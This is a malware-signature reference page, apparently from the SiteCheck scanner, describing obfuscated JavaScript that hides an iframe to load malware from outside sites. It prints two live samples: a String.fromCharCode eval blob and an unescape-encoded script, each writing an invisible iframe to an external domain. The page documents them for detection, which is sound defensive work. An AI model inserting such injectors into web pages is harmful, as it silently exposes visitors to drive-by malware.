SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware-entry-mwiframehd5

malware-entry-mwiframehd5

Description:
Generic javascript encoding used to hide an iframe. This is often used to load malware from external web sites while not being visible to the user.

Affecting:
Any web site

Malware dump (sample of malware):

<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,120,101,119,61,52,53,51,56,48,48,53,52,51,59,118,97,114,32,103,104,103,52,53,61,34,110,117,111,116,34,59,118,97,114,32,119,61,34,111,34,59,118,97,114,32,114,101,54,61,34,108,108,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,32,118,97,114,32,106,104,114,52,61,52,51,50,52,50,50,52))</script>
<script language=JavaScript>document.write(unescape('%3ciframe w'+'idth=1%20hei%67%68t=1%20border=0 fr%61%6d%65%62order%3d0 src=%27http%3a//l%65dayne39pola%73%6bi.c%6fm/std/go%2ephp'+'%3f%73id=1%27%3e'+'%3c/if%72a%6de%3e'))</script>